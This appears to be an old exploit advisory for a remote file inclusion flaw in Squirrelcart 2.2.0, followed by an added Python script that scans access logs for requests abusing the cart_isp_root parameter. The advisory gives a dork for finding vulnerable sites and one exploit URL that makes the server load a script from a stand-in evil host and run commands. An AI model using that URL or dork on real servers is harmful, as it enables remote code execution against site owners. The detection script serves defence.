-------------------------------------------------------------------------
$ Title : Squirrelcart 2.2.0 <= Remote File Inclusion Vulnerability     $
$-----------------------------------------------------------------------$
$ URL   : http://www.ldev.com/                                          $
$-----------------------------------------------------------------------$
$ Dork  : inurl:/squirrelcart/ or powered by Squirrelcart               $
$-----------------------------------------------------------------------$
$ Author: OLiBekaS                                                      $
$-----------------------------------------------------------------------$
$ mail  : olibekas[at]gmail.com                                         $
$-----------------------------------------------------------------------$

Greetz : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew

Exploit:

http://[target]/[Squirrelcart_path]/cart_content.php?cart_isp_root=http://[evilhost]/cmd.gif?cmd=ls
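
A log check for the request pattern in the exploit line above, as an added example that is not part of the original advisory. It assumes common/combined-format access logs; the sample lines, hosts and the list of remote prefixes are constructed for illustration, and only cart_content.php and cart_isp_root come from the advisory.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

SCRIPT = "cart_content.php"   # script named in the advisory
PARAM = "cart_isp_root"       # parameter named in the advisory
# Assumed heuristic: an include root should be a local path, so any
# scheme://, protocol-relative //, UNC \\ or data: value is reported.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|//|\\\\|data:)", re.I)
# Request field of a common/combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; hosts and addresses are documentation placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/cart_content.php?cart_isp_root=http://files.example/cmd.gif?cmd=ls HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /shop/cart_content.php?cart_isp_root=/var/www/shop HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/cart_content.php?cart_isp_root=http%253A%252F%252Ffiles.example%252Fcmd.gif HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2024:10:00:12 +0000] "GET /shop/index.php?page=1 HTTP/1.1" 200 4096',
]

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def remote_include_value(request_target):
    """Return the decoded cart_isp_root value if it points off-host, else None."""
    parts = urlsplit(request_target)
    if not fully_unquote(parts.path).lower().endswith("/" + SCRIPT):
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_unquote(value)
        if fully_unquote(key).lower() == PARAM and REMOTE.search(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        value = remote_include_value(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: {PARAM} -> {value}")
```

Access logs record only the query string, so a cart_isp_root value sent in a POST body would need the same check applied at a WAF or in the application.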